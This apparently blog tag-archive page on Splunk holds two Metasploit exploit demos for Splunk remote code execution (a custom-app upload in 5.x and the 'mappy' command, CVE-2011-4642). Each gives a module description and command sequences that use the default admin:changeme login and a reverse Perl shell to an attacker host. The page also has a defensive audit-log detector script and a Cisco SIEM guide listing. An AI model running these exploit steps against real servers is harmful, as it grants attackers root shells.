Tag Archives: Splunk

Splunk 5.0 Custom App Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered by Marc Wickenden
Vulnerability details provided by Marc Wickenden on 2012-11-12
Metasploit PoC provided by Marc Wickenden on 2012-11-14

PoC provided by :

@marcwickenden
sinn3r
juan vazquez

Reference(s) :

Splunk: With Great Power Comes Great Responsibility
Abusing Splunk Functionality with Metasploit

Affected version(s) :

All Splunk 5.x versions

Tested on Centos 5.8 x86 with :

Splunk version 5.0.1, build 143156

Description :

This module exploits a feature of Splunk whereby a custom application can be uploaded through the web-based interface. Through the script search command a user can call commands defined in their custom application, which can include arbitrary Perl or Python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential admin:changeme, the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux, by default. This module has only been tested successfully against Splunk 5.0.

Commands :

use exploit/multi/http/splunk_upload_app_exec
set RHOST 192.168.178.34
set TARGET 0
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.26
exploit

ifconfig
id
uname -a
ps

CVE-2011-4642 Splunk Search Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Gary O’Leary-Steele
Coordinated public release of the vulnerability on 2011-12-12
Metasploit PoC provided on 2011-12-22

PoC provided by :

Gary O’Leary-Steele
juan vazquez

Reference(s) :

CVE-2011-4642
OSVDB-77695
SPL-45172

Affected version(s) :

Splunk 4.2 to 4.2.4

Tested on Ubuntu 10.04.3 LTS with :

Splunk 4.2.4

Description :

This module abuses a command execution vulnerability in the web-based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the ‘mappy’ search command, which allows attackers to run Python code. To exploit this vulnerability, a valid Splunk user with the admin role is required. By default, this module uses the credential “admin:changeme”, the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.

Commands :

use exploit/multi/http/splunk_mappy_exec
set RHOST 192.168.178.110
set VHOST blackhole.zataz.loc
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a
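Both demos above reach an interpreter through a search command (script against an uploaded custom app, mappy in 4.2.x), so the search audit trail is where a defender would look first. The following is an added example, not part of either post or of the Metasploit modules: it scans constructed audit-style lines and flags granted searches that pipe into script or mappy, noting when the user is the default admin account. The line layout and field names are assumptions, not a verified Splunk audit format.

```python
import re
from dataclasses import dataclass

# Search commands the two demos above use to reach an interpreter:
# 'script' (code from an uploaded app) and 'mappy' (CVE-2011-4642).
RISKY_COMMANDS = ("script", "mappy")
DEFAULT_ADMIN_USER = "admin"  # account both modules log in as by default

# Constructed audit-style lines for this example. The field layout is an
# assumption, not a verified Splunk log format; adapt AUDIT_RE to your audit.log.
SAMPLE_AUDIT = """\
Audit:[timestamp=11-14-2012 10:02:01.001, user=alice, action=search, info=granted, search='search index=web status=500 | stats count by host']
Audit:[timestamp=11-14-2012 10:03:17.221, user=admin, action=search, info=granted, search='search index=_internal | head 1 | mappy host']
Audit:[timestamp=11-14-2012 10:04:40.510, user=admin, action=search, info=granted, search='| script evilapp run_me']
Audit:[timestamp=11-14-2012 10:05:02.004, user=bob, action=search, info=granted, search='search sourcetype=script_output | head 5']
"""

AUDIT_RE = re.compile(
    r"timestamp=(?P<ts>[^,]+), user=(?P<user>[^,]+), action=search, "
    r"info=granted, search='(?P<search>.*)'\]\s*$"
)
# Match the command name only in command position (start of the pipeline or
# right after a pipe), so a value such as sourcetype=script_output is ignored.
CMD_RE = re.compile(r"(?:^|\|)\s*(%s)\b" % "|".join(RISKY_COMMANDS))


@dataclass
class Finding:
    timestamp: str
    user: str
    command: str
    search: str
    default_admin: bool  # search ran as the default admin account


def find_risky_searches(audit_text: str) -> list:
    # One Finding per granted search that pipes into a risky command.
    findings = []
    for line in audit_text.splitlines():
        m = AUDIT_RE.search(line)
        if not m:
            continue  # not a granted search record in the assumed layout
        cmd = CMD_RE.search(m["search"])
        if cmd:
            findings.append(Finding(m["ts"], m["user"], cmd.group(1), m["search"],
                                    m["user"] == DEFAULT_ADMIN_USER))
    return findings


if __name__ == "__main__":
    for f in find_risky_searches(SAMPLE_AUDIT):
        flag = " (default admin account)" if f.default_admin else ""
        print(f"{f.timestamp} user={f.user} cmd={f.command}{flag}: {f.search}")
```

Feeding the real audit records into the same logic, and alerting when the default admin account is still the one running such searches, covers the precondition both modules rely on.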

Cisco Smart Business Architecture (SBA) guides for SIEM solutions integration

Cisco provides some useful Smart Business Architecture (SBA) guides for SIEM solution integration that help you design and deploy best practices covering Cisco switching, routing, security and wireless technologies.

Currently the SBA guides cover the following solutions :

  • An SBA guide that provides a general overview of SIEM technology, as well as best practices, use cases and deployment considerations for using a SIEM with Cisco infrastructure, including log retrieval methods for Cisco products.
  • An SBA guide for ArcSight SIEM platform (ESM, Logger, Express, SmartConnectors and Content Pack) integration.
  • An SBA guide for LogLogic MX Series SIEM product integration.
  • An SBA guide for netForensics nFX Cinxi One SIEM product integration.
  • An SBA guide for RSA enVision SIEM product integration.
  • An SBA guide for the Splunk security management solution.